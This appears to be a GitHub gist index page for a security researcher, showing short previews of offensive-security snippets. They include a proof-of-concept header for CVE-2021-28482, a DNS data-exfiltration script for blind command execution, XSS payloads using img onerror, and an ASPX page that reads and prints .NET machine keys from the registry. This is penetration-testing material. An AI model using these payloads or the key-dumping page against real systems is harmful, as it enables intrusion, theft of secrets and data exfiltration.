Soroush Dalili irsdl
irsdl
/ urlhostname_test.js
Created
March 14, 2024 10:54
To evaluate how `URL(url).hostname` in JS handles discarded characters and character conversions in domain names.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // by @irsdl | |
| // This script identifies anomalies in how JS parses the URL using `URL(url).hostname`: | |
| // 1- Characters that are ignored when present in the domain name. | |
| // 2- Characters that can replace ASCII characters in domain names and still be parsed correctly. In here we want letter S in `soroush.me` | |
| // You can try running this script in your browser's dev console or at https://www.jdoodle.com/execute-nodejs-online/ | |
| // I am sure this must have been looked at before but I cannot find a reference | |
| for (let i = 0; i <= 0xFFFF; i++) { | |
| const unicodeChar = String.fromCharCode(i); | |
| const urlString = `http://sorous${unicodeChar}h.me/blog/`; |
irsdl
/ bambdas_highlighter.java
Created
November 27, 2023 21:54
Highlighting case using Burp Suite Bambda
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // by @irsdl | |
| boolean manualColorHighlightEnabled = true; // e.g. BurpRed anywhere in the request | |
| boolean pwnFoxColorHighlightEnabled = true; // to support PwnFox Firefox extension containers | |
| // BEGIN HIGHLIGHT LOGIC { | |
| boolean hasAlreadyBeenColoured = false; | |
| /* Manual highlight logic to see something like BurpRed */ | |
| if(manualColorHighlightEnabled){ | |
| Pattern manualHighlightPattern = Pattern.compile("burp([a-z]{3,7}+)", Pattern.CASE_INSENSITIVE); // like burpRed or burpYellow |
irsdl
/ PoC_CVE-2021-28482.py
Created
September 7, 2021 21:15
— forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
irsdl
/ pyscripter_snippets.py
Last active
January 5, 2024 05:04
— forked from lanmaster53/pyscripter-snippets.py
Burp Python Scripter scripts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ***********************************************replacer_for_python_scripter | |
| import re,random | |
| print callbacks.getToolName(toolFlag) | |
| if(messageIsRequest): | |
| if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"): | |
| requestInfo = helpers.analyzeRequest(messageInfo) | |
| headers = requestInfo.getHeaders() | |
| msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] | |
| msg = helpers.bytesToString(msgBody) |
irsdl
/ dns_data_exfiltration.sh
Created
October 13, 2020 09:49
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| : ' | |
| Usage: | |
| ./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
| Todo: | |
| 1. add support for powershell | |
| something like the following should do the trick but haven't tested it: | |
| outer_cmd_template="powershell -enc %CMD_B64%" |
irsdl
/ dns_data_exfiltration.sh
Created
October 13, 2020 09:49
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| : ' | |
| Usage: | |
| ./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
| Todo: | |
| 1. add support for powershell | |
| something like the following should do the trick but haven't tested it: | |
| outer_cmd_template="powershell -enc %CMD_B64%" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <img alt="<x" title="/><img src=url404 onerror=xss(0)>"> | |
| <img alt=" | |
| <x" title="/> | |
| <img src=url404 onerror=xss(1)>"> | |
| <style><style/><img src=url404 onerror=xss(2)> | |
| <xmp><xmp/><img src=url404 onerror=xss(3)> |
irsdl
/ machineKeyFinder.aspx
Last active
August 26, 2024 03:56
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="C#" %> | |
| <% | |
| // Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
| Response.Write("<br/><hr/>"); | |
| byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
| if(autoGenKeyV4!=null) | |
| Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
| Response.Write("<br/>"); | |
| byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
| if(autoGenKey!=null) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Convert from iso-8859-1, utf-8ed to binary! | |
| # Useful for file disclosure when encoding can be controlled | |
| # The following C# code shows an example (result is iso-8859-1, utf-8ed!): | |
| ###string encoding = "iso-8859-1"; | |
| ######string sourceFile = @"Newtonsoft.Json.dll"; | |
| ###### | |
| ######public void test() | |
| ######{ | |
| #########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding); | |
| #########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile; |